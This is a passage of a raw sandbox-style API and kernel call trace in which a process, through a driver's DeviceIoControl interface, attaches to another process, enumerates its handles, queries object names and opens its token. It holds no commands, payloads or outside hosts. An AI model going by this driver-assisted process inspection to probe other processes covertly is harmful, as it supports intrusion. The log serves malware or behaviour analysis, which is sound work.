(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0xc8 [0136.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0136.692] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003737b30, HandleInformation=0x0) returned 0x0 [0136.692] ObOpenObjectByPointer (in: Object=0xfffffa8003737b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0136.692] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb9 [0136.692] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8010170480 | out: TokenHandle=0xfffffa8010170480*=0xc4) returned 0x0 [0136.692] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0136.693] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.693] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0136.693] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0137.849] CloseHandle (hObject=0xc4) returned 1 [0137.849] CloseHandle (hObject=0xc8) returned 1 [0137.849] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.849] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0137.849] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.849] PsAcquireProcessExitSynchronization () returned 0x0 [0137.849] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.850] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800365af20, HandleInformation=0x0) returned 0x0 [0137.850] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.850] PsReleaseProcessExitSynchronization () returned 0x2 [0137.850] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.850] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0137.850] ObfDereferenceObject (Object=0xfffffa800365af20) returned 0x1 [0137.850] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.850] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.850] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.850] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0137.851] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.851] PsAcquireProcessExitSynchronization () returned 0x0 [0137.851] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.851] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003665760, HandleInformation=0x0) returned 0x0 [0137.851] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.851] PsReleaseProcessExitSynchronization () returned 0x2 [0137.851] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.851] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f0e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0e044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.851] ObfDereferenceObject (Object=0xfffffa8003665760) returned 0x1 [0137.851] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.851] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.851] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.852] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.852] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.852] PsAcquireProcessExitSynchronization () returned 0x0 [0137.852] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.852] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374bad0, HandleInformation=0x0) returned 0x0 [0137.852] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.852] PsReleaseProcessExitSynchronization () returned 0x2 [0137.852] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.852] ObQueryNameString (in: Object=0xfffffa800374bad0, ObjectNameInfo=0xfffffa8002f0f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0f044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.852] ObfDereferenceObject (Object=0xfffffa800374bad0) returned 0x1 [0137.852] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.852] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.852] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.852] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.853] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.853] PsAcquireProcessExitSynchronization () returned 0x0 [0137.853] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.853] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374cd00, HandleInformation=0x0) returned 0x0 [0137.853] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.853] PsReleaseProcessExitSynchronization () returned 0x2 [0137.853] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.853] ObQueryNameString (in: Object=0xfffffa800374cd00, ObjectNameInfo=0xfffffa8002f13044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f13044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.853] ObfDereferenceObject (Object=0xfffffa800374cd00) returned 0x2 [0137.853] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.853] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.853] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.853] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.854] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.854] PsAcquireProcessExitSynchronization () returned 0x0 [0137.854] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.854] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374ec90, HandleInformation=0x0) returned 0x0 [0137.854] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.854] PsReleaseProcessExitSynchronization () returned 0x2 [0137.854] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.854] ObQueryNameString (in: Object=0xfffffa800374ec90, ObjectNameInfo=0xfffffa8002f18044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f18044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.854] ObfDereferenceObject (Object=0xfffffa800374ec90) returned 0x2 [0137.854] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.854] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.854] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.854] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0137.855] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.855] PsAcquireProcessExitSynchronization () returned 0x0 [0137.855] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.855] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374e980, HandleInformation=0x0) returned 0x0 [0137.855] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.855] PsReleaseProcessExitSynchronization () returned 0x2 [0137.855] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.855] ObQueryNameString (in: Object=0xfffffa800374e980, ObjectNameInfo=0xfffffa8002f19044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f19044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.855] ObfDereferenceObject (Object=0xfffffa800374e980) returned 0x2 [0137.855] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.855] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.855] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.856] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.856] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.856] PsAcquireProcessExitSynchronization () returned 0x0 [0137.856] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.856] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374ff20, HandleInformation=0x0) returned 0x0 [0137.856] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.856] PsReleaseProcessExitSynchronization () returned 0x2 [0137.856] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.856] ObQueryNameString (in: Object=0xfffffa800374ff20, ObjectNameInfo=0xfffffa8002f1a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f1a044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.856] ObfDereferenceObject (Object=0xfffffa800374ff20) returned 0x2 [0137.856] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.857] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.857] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.857] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.857] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.857] PsAcquireProcessExitSynchronization () returned 0x0 [0137.857] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.857] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003751c80, HandleInformation=0x0) returned 0x0 [0137.857] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.857] PsReleaseProcessExitSynchronization () returned 0x2 [0137.857] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.857] ObQueryNameString (in: Object=0xfffffa8003751c80, ObjectNameInfo=0xfffffa8002f1b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f1b044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.858] ObfDereferenceObject (Object=0xfffffa8003751c80) returned 0x2 [0137.858] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.858] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.858] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.858] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0137.858] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.858] PsAcquireProcessExitSynchronization () returned 0x0 [0137.858] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.858] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037529a0, HandleInformation=0x0) returned 0x0 [0137.858] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.858] PsReleaseProcessExitSynchronization () returned 0x2 [0137.858] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.858] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8002f20044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f20044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.859] ObfDereferenceObject (Object=0xfffffa80037529a0) returned 0x1 [0137.859] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.859] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.859] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.859] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0137.859] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.859] PsAcquireProcessExitSynchronization () returned 0x0 [0137.859] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.859] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003754f20, HandleInformation=0x0) returned 0x0 [0137.859] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.859] PsReleaseProcessExitSynchronization () returned 0x2 [0137.859] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.859] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8002f22044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f22044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.859] ObfDereferenceObject (Object=0xfffffa8003754f20) returned 0x1 [0137.859] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.859] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.859] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.859] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.859] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.860] PsAcquireProcessExitSynchronization () returned 0x0 [0137.860] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.860] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003758f20, HandleInformation=0x0) returned 0x0 [0137.860] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.860] PsReleaseProcessExitSynchronization () returned 0x2 [0137.860] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.860] ObQueryNameString (in: Object=0xfffffa8003758f20, ObjectNameInfo=0xfffffa8002f25044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f25044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.860] ObfDereferenceObject (Object=0xfffffa8003758f20) returned 0x2 [0137.860] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.860] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.860] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.860] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.860] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.860] PsAcquireProcessExitSynchronization () returned 0x0 [0137.860] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.861] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003761880, HandleInformation=0x0) returned 0x0 [0137.861] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.861] PsReleaseProcessExitSynchronization () returned 0x2 [0137.861] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.861] ObQueryNameString (in: Object=0xfffffa8003761880, ObjectNameInfo=0xfffffa8002f26044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f26044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.861] ObfDereferenceObject (Object=0xfffffa8003761880) returned 0x2 [0137.861] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.861] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.861] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.861] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.861] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.861] PsAcquireProcessExitSynchronization () returned 0x0 [0137.861] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.862] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037639a0, HandleInformation=0x0) returned 0x0 [0137.862] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.862] PsReleaseProcessExitSynchronization () returned 0x2 [0137.862] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.862] ObQueryNameString (in: Object=0xfffffa80037639a0, ObjectNameInfo=0xfffffa8002f27044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f27044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.862] ObfDereferenceObject (Object=0xfffffa80037639a0) returned 0x1 [0137.862] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.862] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.862] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.862] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.862] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.862] PsAcquireProcessExitSynchronization () returned 0x0 [0137.862] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880051635d0) [0137.863] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003765b30, HandleInformation=0x0) returned 0x0 [0137.863] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.863] PsReleaseProcessExitSynchronization () returned 0x2 [0137.863] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb7 [0137.863] ObQueryNameString (in: Object=0xfffffa8003765b30, ObjectNameInfo=0xfffffa8002f28044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f28044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.863] ObfDereferenceObject (Object=0xfffffa8003765b30) returned 0x2 [0137.863] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.863] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.863] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.863] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0137.863] 